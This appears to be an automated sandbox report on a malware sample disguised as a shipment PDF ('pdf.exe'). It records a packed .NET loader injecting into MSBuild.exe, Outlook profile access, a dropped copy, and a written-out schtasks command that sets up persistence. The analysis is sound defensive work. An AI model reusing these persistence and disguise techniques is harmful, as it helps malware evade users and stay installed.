                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Shipment 990847575203.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Shipment 990847575203.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, jQtbrjIkx2d5oocfLW.cs.Net Code: phSsPsqGmA System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Shipment 990847575203.pdf.exe.7b70000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, jQtbrjIkx2d5oocfLW.cs.Net Code: phSsPsqGmA System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeCode function: 0_2_0185D8B7 push edi; iretd 0_2_0185D8D1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB07D9 push edi; retn 0000h9_2_00CB07DA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB37E8 push esi; retf 9_2_00CB37E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB07E0 push edi; retn 0000h9_2_00CB07EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB37E4 push esi; retf 9_2_00CB37E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB07AD push edi; retn 0000h9_2_00CB07CA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB891E pushad ; iretd 9_2_00CB891F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB8C2F pushfd ; iretd 9_2_00CB8C30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00CB8DDF push esp; iretd 9_2_00CB8DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_0119A5BB push es; ret 17_2_0119A5C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06AB9233 push es; ret 17_2_06AB9244
                  Source: Shipment 990847575203.pdf.exeStatic PE information: section name: .text entropy: 7.722678416773331
                  Source: FZcXKpA.exe.0.drStatic PE information: section name: .text entropy: 7.722678416773331
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, H2EO4uflVClPeHg5dc.csHigh entropy of concatenated method names: 'YWKWCCL0mY', 'KdAWyeFeQO', 'Mh8W4VAd1U', 'qFfWw4n9uM', 'sUBW1sN5ai', 'iB9WT6y3Xj', 'fd6WppZGrG', 'zCrW0EYrkH', 'fBLWhndCOD', 'RWPWDhkR7l'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, PRY7ePpMX6vanqjPoG.csHigh entropy of concatenated method names: 'KvuUYiuUyG', 'CfOU6naZ6u', 'dp2U35fe5M', 'i853F4Ynv8', 'NON3zfeCht', 'JEfUdGbal7', 'TnNUiTkGg9', 'sCjUtlo4xb', 'v0BUVER2HQ', 'nkUUs42daR'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, yoXA61ylf4l4Q83oN1.csHigh entropy of concatenated method names: 'YOO6mRSOp2', 'sTk6LgWwWq', 'N2R6Ci4FGe', 'jsY6ydGPiH', 'I4H6OG157A', 'urZ68RCIEO', 'nWb6bLegJ8', 'Qgm6Na6GIa', 'EqS6Xk6vMy', 'zja6xFc2yW'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, CRp3GtusZBAEmWpROn.csHigh entropy of concatenated method names: 'ToString', 'PRo8DZQiFD', 'OK98wwCXMt', 'p7s8Byjyrr', 'nqX81f4QAi', 'qWb8TLmfoD', 'Rrw8KXTkr6', 'vE18pnrlNA', 'OVo80L4cA7', 'bIr8gFaJ9u'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, kDHMSYagSA2XxZ0rWP.csHigh entropy of concatenated method names: 'Dispose', 'hOjiqiw1tV', 'oWrtwJ7aK9', 'ANRerOVjan', 'DduiF6iRxO', 'oiHiz2Bvh2', 'ProcessDialogKey', 'B3etdoDekr', 'kprti94iJD', 'aa1tthxIr8'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, fhjhn1idwjxxig0oK1N.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'M3FxD89rYC', 'wugxcE4Nea', 'VTLxfZH8J6', 'yFOxlD9N9o', 'q2Bxr9HQAM', 'chMxuElKWs', 'Y2qxnpSYk8'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, xoDekrqIpr94iJDda1.csHigh entropy of concatenated method names: 'qGXX4Ds1Lk', 'iaDXwLlbEk', 'XflXBRImhi', 'Tm9X1EvkoY', 'dIpXTBcaMZ', 'TxMXK6YWk8', 'gMMXpYDAfw', 'cjTX00B9jN', 'eu8XgIp0yG', 'yPpXhLZW0P'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, Nuf84oii8TDlxRmuOwj.csHigh entropy of concatenated method names: 'xhuxFf0EJk', 'D9Uxz5IKuN', 'ifcRdq3uhD', 'dfaRiYijFY', 'W53RtfJds8', 'KbmRVlcowm', 'PlkRs7Pq8V', 'FJURAE2Kqg', 'q9wRYkrXBR', 'M1LRaIuRR9'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, p193nWsoohnuqO1fal.csHigh entropy of concatenated method names: 'BCUiUynCmX', 'Y47iIq9Whp', 'IlfiZ4l4Q8', 'ioNiS16nER', 'E2ZiOQt0hi', 'qkvi8mdLl9', 'X8nL3hM4Ymks6840qj', 'ULpwbk86xSt2RHi7tt', 'R0ZiiiqWEa', 'YjuiVDFRZu'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, h0viivthtdPD7AE9q4.csHigh entropy of concatenated method names: 'qi8PA0jfF', 'ls8mLPvX3', 'nRrLaN3T9', 'fYe5LfySs', 'K0GyJOjvh', 'U2AjCbM96', 'buUwb6RVsqKl2aBuHf', 'jDYy28IdqiTexjg0AK', 'LdMNE49jX', 'mbAxIkJ2L'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, z06ShxJKP6Ojiw1tVC.csHigh entropy of concatenated method names: 'bIwXOgxdb4', 'Db1XbPlpBb', 'gmfXX4NlJE', 'rwEXRWgxXj', 'IDHXGuBaGN', 'XL0XoZEgfZ', 'Dispose', 'kZxNYjZtHO', 'bmoNaWvj9b', 's2SN6v28fX'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, QqlwWTit35kB8Cy0AbA.csHigh entropy of concatenated method names: 'ToString', 'Ww3RC8pK05', 'zYwRyXZEtK', 'uW1RjHVNk1', 'NJhR4pEA9V', 'JpsRwtLqXI', 'EdURBDQF79', 'kc7R1rfOpW', 'HaPNo4oNsW9aI2g2VbF', 'ors1LfohDVoZtkPkn6E'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, tguQVK9tZtAxc3a75h.csHigh entropy of concatenated method names: 'Vapb25uda6', 'Fb2bFwiL4s', 'umsNdPc39R', 'v0LNiLU1me', 'vwjbD7cHxc', 'LsAbctiKtx', 'TKQbf52oFT', 'dTZblpvnni', 'XjcbrDqqZc', 'YvObuTZAtm'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, jynCmXCF47q9Whp0rl.csHigh entropy of concatenated method names: 'dJnalPx3EN', 'N48arvxh66', 'uHxauMDcq6', 'f46anSlR6M', 'Y9oa7oUamX', 'JKNa9Z7k3W', 'tJSaJ5HQNW', 'wbla2nbQ7I', 'jbDaqHSEcF', 'FijaFUuAKc'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, EBEqYZglTFqw7qayu7.csHigh entropy of concatenated method names: 'JsHUe3pCI8', 'nc2UkHHfbd', 'ILJUPqDfkB', 'qXlUmrZK1f', 'vsuUHq1jTy', 'AY6ULT53wg', 'bjkU5cBiyJ', 'TQTUCbOvW0', 'vOLUyC7n8y', 'p3KUjxhYei'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, BPxW7yl9kpekboTtat.csHigh entropy of concatenated method names: 'aqwOhvfTS9', 'kMNOcUY3gg', 'sKeOl8fC51', 'CrFOr6XjkZ', 'mXrOwnxMEE', 'A0JOBBwP2D', 'OBjO1Gi9pm', 'ztAOTCBYZr', 'WLXOK4NBX6', 'X7iOpb3fhF'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, Mhibkv4mdLl9kJHNxS.csHigh entropy of concatenated method names: 'LyW3Adccm0', 'sax3ay78Hx', 'MTS3QAXulN', 'D2A3UCH8L5', 'n5a3ItHlfk', 'TuRQ7GKnDT', 'zRFQ9b08Kl', 'kCqQJectYb', 'sqVQ2VIw3T', 'wcWQqeFMPL'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, hnER9ij17BiqWy2ZQt.csHigh entropy of concatenated method names: 'NEkQH34heV', 'CoJQ5yVW6Y', 'c6k6BAmZax', 'tKF611uXN1', 'UY56TlFvrs', 'eX36KLlbrg', 'tmj6p3sgcK', 'fmE60LGly6', 'IEq6gfgx3V', 'LT56hQjWoS'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, ERU2yGisNADuKaiepMI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eWbMXV23bT', 'ODBMxaaiiu', 'AbGMRUsZ38', 'LvCMMAjTa4', 'AfpMGxALXf', 'SlAME6TJK2', 'OLeMokCnQi'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, jQtbrjIkx2d5oocfLW.csHigh entropy of concatenated method names: 'SLHVAsCCKx', 'AB1VYJjiQ9', 'drAVaRwtCE', 'N6hV68fCqC', 'dVnVQilDxO', 'nhnV3plytD', 'oLWVUJ8Hg7', 'zhqVIuOyre', 'whlVviGs3E', 'WAwVZKCC92'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, BKswpgz6v2Ti4RbQAR.csHigh entropy of concatenated method names: 'UbCxLXXZFv', 'J4BxCYpwZ9', 'W60xyTexUX', 'Nmyx4LfAE4', 'gsExwdgvCE', 'lfHx1dhfEI', 'YAkxTth2v6', 'BUNxoUv3YY', 'E0dxeuZWnZ', 'AecxkScgo7'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, H2EO4uflVClPeHg5dc.csHigh entropy of concatenated method names: 'YWKWCCL0mY', 'KdAWyeFeQO', 'Mh8W4VAd1U', 'qFfWw4n9uM', 'sUBW1sN5ai', 'iB9WT6y3Xj', 'fd6WppZGrG', 'zCrW0EYrkH', 'fBLWhndCOD', 'RWPWDhkR7l'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, PRY7ePpMX6vanqjPoG.csHigh entropy of concatenated method names: 'KvuUYiuUyG', 'CfOU6naZ6u', 'dp2U35fe5M', 'i853F4Ynv8', 'NON3zfeCht', 'JEfUdGbal7', 'TnNUiTkGg9', 'sCjUtlo4xb', 'v0BUVER2HQ', 'nkUUs42daR'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, yoXA61ylf4l4Q83oN1.csHigh entropy of concatenated method names: 'YOO6mRSOp2', 'sTk6LgWwWq', 'N2R6Ci4FGe', 'jsY6ydGPiH', 'I4H6OG157A', 'urZ68RCIEO', 'nWb6bLegJ8', 'Qgm6Na6GIa', 'EqS6Xk6vMy', 'zja6xFc2yW'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, CRp3GtusZBAEmWpROn.csHigh entropy of concatenated method names: 'ToString', 'PRo8DZQiFD', 'OK98wwCXMt', 'p7s8Byjyrr', 'nqX81f4QAi', 'qWb8TLmfoD', 'Rrw8KXTkr6', 'vE18pnrlNA', 'OVo80L4cA7', 'bIr8gFaJ9u'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, kDHMSYagSA2XxZ0rWP.csHigh entropy of concatenated method names: 'Dispose', 'hOjiqiw1tV', 'oWrtwJ7aK9', 'ANRerOVjan', 'DduiF6iRxO', 'oiHiz2Bvh2', 'ProcessDialogKey', 'B3etdoDekr', 'kprti94iJD', 'aa1tthxIr8'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, fhjhn1idwjxxig0oK1N.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'M3FxD89rYC', 'wugxcE4Nea', 'VTLxfZH8J6', 'yFOxlD9N9o', 'q2Bxr9HQAM', 'chMxuElKWs', 'Y2qxnpSYk8'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, xoDekrqIpr94iJDda1.csHigh entropy of concatenated method names: 'qGXX4Ds1Lk', 'iaDXwLlbEk', 'XflXBRImhi', 'Tm9X1EvkoY', 'dIpXTBcaMZ', 'TxMXK6YWk8', 'gMMXpYDAfw', 'cjTX00B9jN', 'eu8XgIp0yG', 'yPpXhLZW0P'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, Nuf84oii8TDlxRmuOwj.csHigh entropy of concatenated method names: 'xhuxFf0EJk', 'D9Uxz5IKuN', 'ifcRdq3uhD', 'dfaRiYijFY', 'W53RtfJds8', 'KbmRVlcowm', 'PlkRs7Pq8V', 'FJURAE2Kqg', 'q9wRYkrXBR', 'M1LRaIuRR9'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, p193nWsoohnuqO1fal.csHigh entropy of concatenated method names: 'BCUiUynCmX', 'Y47iIq9Whp', 'IlfiZ4l4Q8', 'ioNiS16nER', 'E2ZiOQt0hi', 'qkvi8mdLl9', 'X8nL3hM4Ymks6840qj', 'ULpwbk86xSt2RHi7tt', 'R0ZiiiqWEa', 'YjuiVDFRZu'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, h0viivthtdPD7AE9q4.csHigh entropy of concatenated method names: 'qi8PA0jfF', 'ls8mLPvX3', 'nRrLaN3T9', 'fYe5LfySs', 'K0GyJOjvh', 'U2AjCbM96', 'buUwb6RVsqKl2aBuHf', 'jDYy28IdqiTexjg0AK', 'LdMNE49jX', 'mbAxIkJ2L'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, z06ShxJKP6Ojiw1tVC.csHigh entropy of concatenated method names: 'bIwXOgxdb4', 'Db1XbPlpBb', 'gmfXX4NlJE', 'rwEXRWgxXj', 'IDHXGuBaGN', 'XL0XoZEgfZ', 'Dispose', 'kZxNYjZtHO', 'bmoNaWvj9b', 's2SN6v28fX'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, QqlwWTit35kB8Cy0AbA.csHigh entropy of concatenated method names: 'ToString', 'Ww3RC8pK05', 'zYwRyXZEtK', 'uW1RjHVNk1', 'NJhR4pEA9V', 'JpsRwtLqXI', 'EdURBDQF79', 'kc7R1rfOpW', 'HaPNo4oNsW9aI2g2VbF', 'ors1LfohDVoZtkPkn6E'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, tguQVK9tZtAxc3a75h.csHigh entropy of concatenated method names: 'Vapb25uda6', 'Fb2bFwiL4s', 'umsNdPc39R', 'v0LNiLU1me', 'vwjbD7cHxc', 'LsAbctiKtx', 'TKQbf52oFT', 'dTZblpvnni', 'XjcbrDqqZc', 'YvObuTZAtm'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, jynCmXCF47q9Whp0rl.csHigh entropy of concatenated method names: 'dJnalPx3EN', 'N48arvxh66', 'uHxauMDcq6', 'f46anSlR6M', 'Y9oa7oUamX', 'JKNa9Z7k3W', 'tJSaJ5HQNW', 'wbla2nbQ7I', 'jbDaqHSEcF', 'FijaFUuAKc'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, EBEqYZglTFqw7qayu7.csHigh entropy of concatenated method names: 'JsHUe3pCI8', 'nc2UkHHfbd', 'ILJUPqDfkB', 'qXlUmrZK1f', 'vsuUHq1jTy', 'AY6ULT53wg', 'bjkU5cBiyJ', 'TQTUCbOvW0', 'vOLUyC7n8y', 'p3KUjxhYei'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, BPxW7yl9kpekboTtat.csHigh entropy of concatenated method names: 'aqwOhvfTS9', 'kMNOcUY3gg', 'sKeOl8fC51', 'CrFOr6XjkZ', 'mXrOwnxMEE', 'A0JOBBwP2D', 'OBjO1Gi9pm', 'ztAOTCBYZr', 'WLXOK4NBX6', 'X7iOpb3fhF'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, Mhibkv4mdLl9kJHNxS.csHigh entropy of concatenated method names: 'LyW3Adccm0', 'sax3ay78Hx', 'MTS3QAXulN', 'D2A3UCH8L5', 'n5a3ItHlfk', 'TuRQ7GKnDT', 'zRFQ9b08Kl', 'kCqQJectYb', 'sqVQ2VIw3T', 'wcWQqeFMPL'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, hnER9ij17BiqWy2ZQt.csHigh entropy of concatenated method names: 'NEkQH34heV', 'CoJQ5yVW6Y', 'c6k6BAmZax', 'tKF611uXN1', 'UY56TlFvrs', 'eX36KLlbrg', 'tmj6p3sgcK', 'fmE60LGly6', 'IEq6gfgx3V', 'LT56hQjWoS'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, ERU2yGisNADuKaiepMI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eWbMXV23bT', 'ODBMxaaiiu', 'AbGMRUsZ38', 'LvCMMAjTa4', 'AfpMGxALXf', 'SlAME6TJK2', 'OLeMokCnQi'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, jQtbrjIkx2d5oocfLW.csHigh entropy of concatenated method names: 'SLHVAsCCKx', 'AB1VYJjiQ9', 'drAVaRwtCE', 'N6hV68fCqC', 'dVnVQilDxO', 'nhnV3plytD', 'oLWVUJ8Hg7', 'zhqVIuOyre', 'whlVviGs3E', 'WAwVZKCC92'
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, BKswpgz6v2Ti4RbQAR.csHigh entropy of concatenated method names: 'UbCxLXXZFv', 'J4BxCYpwZ9', 'W60xyTexUX', 'Nmyx4LfAE4', 'gsExwdgvCE', 'lfHx1dhfEI', 'YAkxTth2v6', 'BUNxoUv3YY', 'E0dxeuZWnZ', 'AecxkScgo7'
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeFile created: C:\Users\user\AppData\Roaming\FZcXKpA.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Uses an obfuscated file name to hide its real file extension (double extension)
                  Source: Possible double extension: pdf.exeStatic PE information: Shipment 990847575203.pdf.exe
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
